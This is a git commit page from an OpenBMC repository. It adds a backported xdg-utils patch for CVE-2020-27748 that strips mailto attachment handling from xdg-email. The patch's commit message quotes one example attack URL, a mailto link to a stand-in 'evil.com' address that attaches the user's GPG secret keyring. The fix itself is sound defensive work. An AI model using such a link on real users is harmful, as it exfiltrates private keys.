diff options
author | jmbills <jason.m.bills@intel.com> | 2022-01-18 21:55:05 +0300 |
---|---|---|
committer | GitHub <noreply@github.com> | 2022-01-18 21:55:05 +0300 |
commit | 7cf0c1cd0ce835d1833509b7b911e8a97380278b (patch) | |
tree | 0b45c3beaa9874facc4ed1a2395a31e42be0135d /poky/meta/recipes-extended/xdg-utils | |
parent | 4dac5fcd49b5e2de1074f1363775ec0f19041072 (diff) | |
parent | 1fc0d70f658da30091bcd49f9bf29aecd6b99ba7 (diff) | |
download | openbmc-7cf0c1cd0ce835d1833509b7b911e8a97380278b.tar.xz |
Merge pull request #76 from Intel-BMC/update1-0.86
Update
Diffstat (limited to 'poky/meta/recipes-extended/xdg-utils')
-rw-r--r-- | poky/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch | 58 | ||||
-rw-r--r-- | poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb | 1 |
2 files changed, 59 insertions, 0 deletions
diff --git a/poky/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/poky/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch new file mode 100644 index 000000000..948b9e22e --- /dev/null +++ b/poky/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch @@ -0,0 +1,58 @@ +From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io> +Date: Tue, 18 Aug 2020 16:52:24 +0100 +Subject: [PATCH] xdg-email: remove attachment handling from mailto +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This allows attacker to extract secrets from users: + +mailto:sid@evil.com?attach=/.gnupg/secring.gpg + +See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 +and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177 + +Signed-off-by: Jörg Thalheim <joerg@thalheim.io> +--- + scripts/xdg-email.in | 7 +------ + 1 file changed, 1 insertion(+), 6 deletions(-) + +Upstream-Status: Backport +CVE: CVE-2020-27748 + +diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in +index 6db58ad..5d2f4f3 100644 +--- a/scripts/xdg-email.in ++++ b/scripts/xdg-email.in +@@ -32,7 +32,7 @@ _USAGE + + run_thunderbird() + { +- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH ++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY + THUNDERBIRD="$1" + MAILTO=$(echo "$2" | sed 's/^mailto://') + echo "$MAILTO" | grep -qs "^?" +@@ -48,7 +48,6 @@ run_thunderbird() + BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) + SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) + BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) +- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//')) + + if [ -z "$TO" ] ; then + NEWMAILTO= +@@ -68,10 +67,6 @@ run_thunderbird() + NEWMAILTO="${NEWMAILTO},$BODY" + fi + +- if [ -n "$ATTACH" ] ; then +- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'" +- fi +- + NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') + DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" + "$THUNDERBIRD" -compose "$NEWMAILTO" +-- +GitLab + diff --git a/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb index 108e7b8c4..73acf6b74 100644 --- a/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb +++ b/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb @@ -20,6 +20,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014" SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \ file://0001-Reinstate-xdg-terminal.patch \ file://0001-Don-t-build-the-in-script-manual.patch \ + file://1f199813e0eb0246f63b54e9e154970e609575af.patch \ " SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff" |